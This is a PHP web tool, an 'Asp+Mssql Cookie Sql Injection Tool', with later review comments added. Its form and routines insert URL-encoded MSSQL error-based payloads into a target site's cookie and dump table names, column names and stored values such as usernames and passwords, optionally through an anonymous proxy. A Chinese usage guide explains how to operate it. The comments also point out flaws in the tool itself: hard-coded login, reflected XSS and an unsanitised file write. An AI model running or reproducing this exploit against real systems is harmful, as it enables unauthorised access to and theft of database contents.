<?php
// Single-file web front-end. Flow: HTTP Basic auth gate -> copy the POSTed
// form fields into file-scope globals -> render the form (HTML below) -> the
// dispatcher further down calls one of the exploit_*/explode_* routines.
//
// NOTE(review): the username/password are hard-coded in source and checked
// with `==` (not a constant-time comparison; see hash_equals()). Both
// $_SERVER entries are read before the isset() test, so a request without an
// Authorization header raises undefined-key warnings before the 401 is sent.
$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='mika520'){ $auth_ok=1; }
if(!$auth_ok) {
    header('WWW-Authenticate: Basic realm="Top Secret Area"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}
// Raw form input. Every key is read unconditionally (no isset()/default), so
// the initial GET of the page also emits undefined-key warnings.
// NOTE(review): $url, $cookie, $referer, $proxy, $t_name, $tab_name and
// $field_name are echoed back into the form's value="..." attributes (via the
// short-echo tags below) and into the report further down without
// htmlspecialchars() -- a reflected XSS in this tool's own UI.
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
?> <html> <head> <title>Asp+Mssql Cookie Sql Injection Tool</title> <style>body{font-family:trebuchet ms;font-size:16px;color:green;background-color:black}hr{width:100%;height:2px;}</style> </head> <body> <center><h1>Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]</h1></center> <hr><hr> <form action="<?=$_SERVER['PHP_SELF']?>" method="POST"> <center> <table> <tr><td><b>Exploitable Url: </b><input type="text" name="_url" size=60 value="<?=$url?>" /><?php if(isset($url) && empty($url)) echo "<font color=red> unspecified</font>\n"?></td></tr> <tr><td><b>Exploitable Cookie: </b><input type="text" name="_cookie" size=60 value="<?=$cookie?>" /><?php if(isset($cookie) && empty($cookie)) echo "<font color=red> unspecified</font>\n"?></td></tr> <tr><td><b>Referer Url: </b><input type="text" name="_referer" size=60 value="<?=$referer?>" /><?php if(isset($referer) && empty($referer)) echo "<font color=red> unspecified</font>\n"?></td></tr> <tr><td><input type="radio" name="_btype" value="num" <?php if (empty($_btype) || $_btype=="num") echo "checked";?>>Num Type</input> <input type="radio" name="_btype" value="char" <?php if ($_btype=="char") echo "checked";?>>Char Type</input></td></tr> <tr><td><input type="radio" name="_action" value="exp_tabs" <?php if(empty($_action) || $_action=="exp_tabs") echo "checked" ?> onclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables 
Of Current DataBase</input></td></tr> <tr><td><input type="radio" name="_action" value="exp_fields" onclick="_tablename.disabled=false;_fieldname.disabled=true;_tabname.disabled=true;" <?php if($_action=="exp_fields") echo "checked"?>>Explode Fields Of </input><input type="text" name="_tablename" size=30 value="<?php if(!empty($tab_name)) echo $tab_name; else echo $t_name;?>" <?php if($_action != "exp_fields") echo "disabled";?> /></td></tr> <tr><td><input type="radio" name="_action" value="exp_values" onclick="_tablename.disabled=true;_fieldname.disabled=false;_tabname.disabled=false;" <?php if($_action=="exp_values") echo "checked"?>>Explode Values Of </input><input type="text" name="_fieldname" size=30 value="<?=$field_name?>" <?php if($_action != "exp_values") echo "disabled";?>/> IN <input type="text" name='_tabname' size=20 value="<?php if(!empty($t_name)) echo $t_name; else echo $tab_name;?>" <?php if($_action != "exp_values") echo "disabled";?> /></td></tr><br> <tr><td><input type="checkbox" name="_useproxy" value="use_proxy" onclick="javascript:if(this.checked==true){_proxy.disabled=false;}else {_proxy.disabled=true;}" <?php if(isset($useproxy) && !empty($proxy)) echo "checked";?>>Via Anonymous Proxy <input type="text" name="_proxy" size=30 value="<?=$proxy?>" <?php if(empty($proxy)) echo "disabled=true";?> ></input></td></tr> <tr><td><input type="submit" name="_submit" value="Launch Attack"></input><?php echo str_repeat(' ',50);?><input type="reset" name="_reset" value="Reset Attack"></input></td></tr> </table> </center> </form> <hr><hr> <?php
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// `global` at file scope is effectively a no-op (these names are already in
// the global scope); it documents which variables the functions below share
// through their own `global` lists.
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
// MSSQL error-based payload templates: pre-URL-encoded WHERE-clause fragments
// with MFM_* placeholders that the routines below substitute. Every template
// wraps its result in nchar(124) ('|') so find_value() can extract it from the
// error page with one regex. (Defender note: '|'-delimited sysobjects /
// syscolumns sub-selects arriving in a Cookie header are the observable
// signature of this tool.)
// $tab_exp is only referenced from the commented-out loop in exploit_tab();
// $value_exp only from exploit_value(), which the dispatcher never calls.
$tab_exp="%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp="%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp="%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp="%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table="%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column="%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Dispatcher: runs only when the form was submitted with the three required
// fields. Echoes the chosen parameters, then calls the matching routine.
if(array_key_exists("_submit",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
    $bstr=$_POST['_btype'];
    $action=$_POST['_action'];
    echo "<div align=left><b>:::Attack Parameters:::</b><br>\n";
    // NOTE(review): $url, $cookie, $referer, $proxy, $table_name and
    // $field_name come straight from POST and are echoed unescaped here
    // (reflected XSS in this UI).
    echo "<b>Target Url:</b><font color=blue>$url</font><br>\n";
    echo "<b>Target Cookie:</b><font color=blue>\"$cookie\"</font><br>\n";
    echo "<b>Referer Url:</b><font color=blue>$referer</font><br>\n";
    echo "<b>Injection Type:</b>";
    // $bstr is re-typed from the POST string to an int flag: 0 = numeric
    // context, 1 = string context (the routines prepend %27 when it is truthy).
    // Any other POST value leaves $bstr as the raw string.
    switch($bstr){
        case 'num':
            echo "<font color=blue>number</font><br>\n";
            $bstr=0;// numeric
            break;
        case 'char':
            echo "<font color=blue>character</font><br>\n";
            $bstr=1;// character (string)
            break;
    }
    echo "<b>Via Proxy:</b>".((isset($useproxy) && !empty($proxy))?
        '<font color=blue>Yes</font>':'<font color=blue>No</font>')."<br>\n";
    if(isset($useproxy) && !empty($proxy)) echo "<b>Proxy Address:</b><font color=blue>$proxy</font><br>\n";
    echo "<b>Injection Action:</b>";
    // A die() in the validation below aborts mid-page: the closing
    // </body></html> is never emitted.
    switch($action){
        case 'exp_tabs':
            echo "<font color=blue>Explode Table Names</font><br>\n</div>\n";
            exploit_tab();
            break;
        case 'exp_fields':
            echo "<font color=blue>Explode Table Fields</font><br>\n";
            if(empty($t_name)) die("<font color=red>Error:table name must be specified!</font><br>");
            $table_name=$t_name;
            echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n</div>\n";
            exploit_field();
            break;
        case 'exp_values':
            echo "<font color=blue>Explode Table Values</font><br>\n";
            if(empty($tab_name)) die("<font color=red>Error:table name must be specified!</font><br>");
            elseif(empty($field_name)) die("<font color=red>Error:field name must be specified!</font><br>");
            $table_name=$tab_name;
            echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n";
            echo "<b>Fields Name:</b><font color=blue>".str_replace(","," ",$field_name)."</font><br>\n</div>\n";
            explode_value();
            break;
    }
}
// exploit_tab();
// exploit_field();
// explode_value();
///////////////////////////////////////////////////////////////////////////////////////
// Output helpers: stream an HTML table row by row; flush() after each write so
// partial results reach the browser while remote requests are still running.
function output_start() {
    echo "<hr><br>\n";
    echo "<div align=center>\n";
    echo "<table border=\"1\">\n";
    flush();
}
// Emit one header cell. The sentinel strings 'tr' and '/tr' open/close a row
// instead of being printed as a cell. $th is printed unescaped.
function output_th($th) {
    switch($th){
        case 'tr': echo "<tr>"; break;
        case '/tr': echo "</tr>\n"; break;
        default: echo "<th><font color=blue>$th</font></th>\n"; break;
    }
    flush();
}
// Emit one data cell; same 'tr'/'/tr' sentinel convention as output_th().
// $td is printed unescaped -- callers pass content taken from the remote
// response, so a hostile target can inject markup into this page.
function output_td($td) {
    switch($td){
        case 'tr': echo "<tr>"; break;
        case '/tr': echo "</tr>\n"; break;
        default: echo "<td><font color=blue>$td</font></td>\n"; break;
    }
    flush();
}
function output_end() {
    echo "</table></div><br>\n";
    flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump field values
function
explode_value() {
    global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
    $i=1;
    $count=0;
    // $field_name is the raw POSTed comma-separated column list.
    $fields=explode(",",$field_name);
    // Build one SELECT that concatenates every requested column (NULL -> a
    // space via isNull/char(32)) separated by char(92) '\', all wrapped in
    // nchar(124) '|'.
    $sql_str=" And (Select Top 1 nchar(124)";
    $sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))';
    foreach($fields as $field){
        $new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
        $sql_str.=$new_sub_str."+char(92)";
    }
    // Drop the trailing "+char(92)" (9 characters) left by the last iteration.
    $sql_str=substr($sql_str,0,strlen($sql_str)-9);
    $sql_str.="+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by ";
    $sub_str="MIKA_FIELD desc";
    // $sub_strs is created inside this loop; explode() always yields at least
    // one element, so the array exists by the time implode() runs.
    foreach($fields as $field){
        $sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
    }
    $sql_str.=implode(",",$sub_strs).")>0--";
    //echo $sql_str."\n";
    $sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
    // First request: row count via $count_exp, which is already URL-encoded
    // and is therefore spliced into the cookie as-is (no urlencode()).
    $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie);
    else $new_cookie=str_replace('MIKA',$old,$cookie);
    output_start();
    $re=find_value($new_cookie);
    if($re) {
        $count=$re;
        echo "<b>the number of record in $table_name:</b> <font color=blue>$count</font>\n";
    }
    output_th('tr');
    foreach ($fields as $field){ output_th($field); }
    output_th('/tr');
    // One request per row. do-while runs at least once even when the count
    // lookup above returned 0 (then $i<=$count is false after the first pass).
    do{
        $new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
        //echo $sql_str."\n";
        if($bstr) $new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
        else $new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
        $re=find_value($new_cookie);
        output_td('tr');
        if($re) {
            // Split the '\'-joined columns back into cells; each remote value
            // is handed to output_td() without HTML escaping.
            $res=explode("\\",$re);
            foreach($res as $ree){ output_td($ree); }
        }
        output_td('/tr');
        $i++;
    }while($i<=$count);
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// alternative way of dumping table names
function explode_tab(){
    global $bstr,$curl,$cookie;
    $num=1;
    $i=0;
    $old_re="";
    $re="";
    // The literal below contains a line break (kept from the original source);
    // it is passed through urlencode() before being placed in the cookie.
    $words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from 
sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
    init_session();
    // The caller (exploit_tab) has already called output_start(); this
    // function only emits the header row and the 8-cells-per-row body.
    output_th('tr');
    for($i=0;$i<8;$i++) output_th('Tables');
    output_th('/tr');
    output_td('tr');
    do{
        $new_words=str_replace('MIKA_NUM',$num,$words);
        if($bstr) $new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie);
        else $new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
        $re=find_value($new_cookie);
        // Stop when the value repeats the previous one, or when find_value()
        // returns 0 (the while condition).
        if($re!=$old_re) {
            output_td($re);
            if(($num % 8)==0) { output_td('/tr'); output_td('tr'); }
        }
        else break;
        $old_re=$re;
        $num++;
    }while($re);
    output_td('/tr');
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// initialise the cURL session
function init_session(){
    global $proxy,$curl,$referer,$url;
    // A fresh handle per action, stored in the global $curl that find_value()
    // reuses for every request. No timeout or TLS options are set.
    $curl=curl_init();
    curl_setopt($curl,CURLOPT_HEADER,0);
    curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl,CURLOPT_REFERER,$referer);
    curl_setopt($curl,CURLOPT_URL,$url);
    if(isset($useproxy) && !empty($proxy)) curl_setopt($curl,CURLOPT_PROXY,"$proxy");
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// generic value-extraction function
function find_value($cookie){
    global $curl;
    //echo $cookie."\n";
    // Send the request with the payload-bearing Cookie header and return the
    // first |...| span found in the response body with the '|' delimiters
    // stripped. Returns 0 when there is no match, including when curl_exec()
    // failed (its return value is not checked).
    curl_setopt($curl,CURLOPT_COOKIE,$cookie);
    $content=curl_exec($curl);
    //echo $content;
    // `.` does not cross newlines, so the match is confined to one line of
    // the response.
    $re=preg_match("/(\|.+\|)/i",$content,$result);
    if($re) { return str_replace('|','',$result[1]); }
    return 0;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// convert a string to an MSSQL hex literal
function str2sqlhex($str){
    // "0x" followed by, for each byte of $str, its hex value from dechex()
    // and a trailing "00".
    $temp="0x";
    for($i=0;$i<strlen($str);$i++){
        //echo $str[$i]."\n";
        $temp.=dechex(ord($str[$i]))."00";
    }
    //echo $temp."\n";
    return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump table names
function exploit_tab(){
    global $bstr,$cookie,$tab_exp,$count_table,$curl;
    // $table and $temp are only used by the commented-out loop below.
    $table=Null;
    $temp=Null;
    init_session();
    // First request: number of user tables via $count_table (already
    // URL-encoded, spliced in as-is).
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$count_table,$cookie);
    else $new_cookie=str_replace('MIKA',$count_table,$cookie);
    output_start();
    if($re=find_value($new_cookie)){
        echo "<b>Number of tables:</b><font color=blue>$re</font>\n";
    }
    // Earlier NOT IN(...) walk over $tab_exp, disabled in favour of
    // explode_tab(). Left as the author's commented-out code.
    /*do{
        if($table==Null){
            $new_url=str_replace('MFM_TABLES',"''",$tab_exp);
        }
        else{
            $new_url=str_replace('MFM_TABLES',$temp,$tab_exp);
        }
        if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
        else $new_cookie=str_replace('MIKA',$new_url,$cookie);
        $re=find_value($new_cookie);
        if($re) {
            $table=$re;
            if($temp==Null){
                //$temp="'".$table."'";
                $temp=str2sqlhex($table);
            }else{
                //$temp.=","."'".$table."'";
                $temp.=",".str2sqlhex($table);
            }
            fputs($table_file,"|------------+".$table."\n");
            echo "|------------+".$table."\n";
        }
    }while($re);*/
    explode_tab();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump column names
function exploit_field(){
    global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl;
    // The table name is embedded as a hex literal via str2sqlhex().
    $old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp);
    // NOTE: this overwrites the global template in place; a second call in the
    // same request would find the MFM_TABLE_NAME placeholder already gone.
    $count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column);
    $num=1;
    $i=0;
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$count_column,$cookie);
    else $new_cookie=str_replace('MIKA',$count_column,$cookie);
    output_start();
    if($re=find_value($new_cookie)){
        echo "<b>Number of columns in $table_name:</b><font color=blue>$re</font>\n";
    }
    output_th('tr');
    for($i=0;$i<4;$i++) output_th('Fields');
    output_th('/tr');
    output_td('tr');
    // One request per column ordinal (MFM_NUM); stops at the first miss.
    do{
        $temp=$old_url;
        $new_url=str_replace('MFM_NUM',"$num",$temp);
        if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
        else
        $new_cookie=str_replace('MIKA',$new_url,$cookie);
        //echo $new_url."\n";
        $re=find_value($new_cookie);
        if($re){
            output_td($re);
            if(($num % 4)==0) { output_td('/tr'); output_td('tr'); }
        }
        $num++;
    }while($re);
    output_td('/tr');
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// old way of dumping field values
// Not reachable from the dispatcher (the exp_values action calls
// explode_value()). Writes plain-text progress to the page and to a file.
// NOTE(review): the output file name is built from the POSTed field name
// (fopen("records-$field_name.txt","w")) with no sanitisation -- a path
// traversal / arbitrary file write on the host running this script.
function exploit_value(){
    global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl;
    $value=Null;
    $temp=Null;
    $count_num=1;
    $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie);
    else $new_cookie=str_replace('MIKA',$old,$cookie);
    $re=find_value($new_cookie);
    $record_file=fopen("records-$field_name.txt","w");
    // $count is only assigned on success; otherwise the loop's `<=` test
    // compares against an undefined variable (null) and ends after one pass.
    if($re) {
        $count=$re;
        echo "the number of record in $table_name is: $count\n";
        fputs($record_file,"the number of record in $table_name is: $count\n");
    }
    $old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp);
    $old=str_replace('MFM_TABLE_NAME',$table_name,$old);
    //echo $old."\n";
    // Walks the values with NOT IN(<values seen so far>); $temp accumulates
    // the comma-separated str2sqlhex() list that fills MFM_VALUE.
    do{
        if($value==Null){
            $new_url=str_replace('MFM_VALUE',"''",$old);
        }
        else{
            $new_url=str_replace('MFM_VALUE',$temp,$old);
        }
        if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
        else $new_cookie=str_replace('MIKA',$new_url,$cookie);
        $re=find_value($new_cookie);
        if($re) {
            $value=$re;
            echo "|------------+ ".$value."\n";
            fputs($record_file,"|------------+ ".$value."\n");
            if($temp==Null){
                //$temp="'".urlencode($value)."'";
                //$temp=urlencode("'".urlencode($value)."'");
                $temp=str2sqlhex($value);
                //echo $temp."\n";
            }else{
                //$temp.=","."'".urlencode($value)."'";
                //$temp.=",".urlencode("'".urlencode($value)."'");
                $temp.=",".str2sqlhex($value);
            }
        }else{
            echo "|------------+ None\n";
            fputs($record_file,"|------------+ None\n");
        }
        $count_num++;
    }while($count_num<=$count);
    fclose($record_file);
}
///////////////////////////////////////////////////////////////////////////////////////
?> <?php
// Usage notes (Chinese, user-facing HTML left verbatim); rendered only when
// the form has not been submitted.
if(!array_key_exists('_submit',$_POST)){ ?> <center><h2><font color=blue>cookie注入辅助工具 by mika[EST]</font></h2></center><br> <div align=center> <font color=red>只针对mssql数据库,且错误提示开启。</font><br> <font color=blue>用法非常简单:</font><br> <font color=blue>首先将实际获得cookie填入"exploitable cookie"栏里。并将可注入的字段后面加上MIKA这 个关键字,如下例所示,不要有空格。比如下面这个cookie:</font><br> <font color=red>"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"</font><br> <font color=blue>其中myset这个字段没有过滤好,存在注入漏洞,那么你就需要在template后面加上MIKA这个关键字 因此$cookie全局变量就成了如下这个样子:</font><br> <font color=red>$cookie="my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";</font><br> <font color=blue>"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容,一般情况下跟"Exploitable Url" 一样就可以了。 </font><br> <font color=blue>"Num Type"和"Char Type"是注入的类型,前者代表数值型,后者代表字符型,根据实际情况填写即可。<br> "Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。<br> "Explode Fields Of" 爆取某个表的字段值,后面填上要暴取字段的表名.<br> "Explode Values Of" 暴取某个表的字段值。后面两个文本框,从左到又依次填写字段名和表名。其中字段数可以一次填写多个,以逗号(",")隔开,比如:<br> <font color=red>username,password,userid</font><br> "Via Anonymous Proxy" 是选择是否使用匿名HTTP代理,代理地址格式为"127.0.0.1:8080".<br> </font> <font color=red>by mika[EST]</font><br> </div> <?php } ?> </body> </html>